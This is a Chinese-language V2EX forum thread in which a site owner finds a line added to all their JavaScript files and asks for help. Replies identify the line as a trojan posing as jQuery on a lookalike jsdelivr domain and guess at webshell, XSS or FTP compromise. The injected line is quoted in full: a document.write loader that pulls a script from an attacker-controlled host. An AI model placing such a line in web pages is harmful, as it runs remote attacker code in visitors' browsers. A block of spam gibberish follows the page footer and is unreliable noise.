这是被挂了什么代码 - V2EX
jalen

这是被挂了什么代码

  •  
  •   jalen Oct 26, 2022 5351 views
    This topic created in 1298 days ago, the information mentioned may be changed or developed.
    document.write(unescape("%3Cscript src='https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js'%3E%3C/script%3E")); 

    把加载的 js 最后全加了这个。

    17 replies    2022-11-14 12:08:38 +08:00
    QUC062IzY3M1Y6dg
        1
    QUC062IzY3M1Y6dg  
       Oct 26, 2022
    就是给网页添加了 jquery 库的引入标签,不过这样写的话,整个页面都废了全部被覆盖。
    jalen
        2
    jalen  
    OP
       Oct 26, 2022
    @shuxhan #1 我就是被挂了木马了。 文件被修改了
    kenvix
        3
    kenvix  
       Oct 26, 2022
    打开 https://cdn.jsdelivr.autos/npm/jquery/dist/jquery.min.js 显然这不是正常的 jquery 而是假装 jq 的马
    jalen
        4
    jalen  
    OP
       Oct 26, 2022
    @kenvix #3 这种情况大概率是怎么植入的,我现在不知道怎么防
    illl
        5
    illl  
       Oct 26, 2022 via iPhone
    被 getshell 了吧,网站用的啥框架
    mxT52CRuqR6o5
        6
    mxT52CRuqR6o5  
       Oct 26, 2022
    那可能性可多了
    edis0n0
        7
    edis0n0  
       Oct 26, 2022
    @kenvix #3 这个伪装不太行,以前我见过的伪装 jq 的马空 referrer 的时候都能返回真 jq
    r4aAi04Uk2gYWU89
        8
    r4aAi04Uk2gYWU89  
       Oct 26, 2022   1
    @jalen 如果博客开了评论,检查下 xss 。不过所有页面都有加的话,估计 webshell 早拿到了
    learningman
        9
    learningman  
       Oct 26, 2022   1
    头一回见到 autos 这个顶级域
    wingor2015
        10
    wingor2015  
       Oct 26, 2022
    遇到过一次是服务器上的代码被加了
    jalen
        11
    jalen  
    OP
       Oct 26, 2022
    我看了自己的文件 就 js 被修改过,也没有新增文件。服务器也没被闯入的痕迹。 这攻击点会在哪里?
    hxy100
        12
    hxy100  
       Oct 27, 2022
    这个域名也很有迷惑性,仿知名 CDN 的域名 jsdelivr.com
    MEIerer
        13
    MEIerer  
       Oct 27, 2022
    我好久没中过木马了,现在装东西看见内存小的都会往哈勃测一下
    jalen
        14
    jalen  
    OP
       Oct 27, 2022
    @MEIerer #13 哈勃?什么东西
    Trient
        15
    Trient  
       Oct 27, 2022
    siwi
        16
    siwi  
       Nov 12, 2022
    找到问题所在了吗? 我也是被挂了这个链接
    jalen
        17
    jalen  
    OP
       Nov 14, 2022
    @siwi 我不知道问题出在哪里, 反正就先删了 js 。 是不是 ftp 被干了,因为服务器没看到被破。
    About     Help     Advertise     Blog     API     FAQ     Solana     3029 Online   Highest 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 48ms UTC 08:47 PVG 16:47 LAX 01:47 JFK 04:47
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86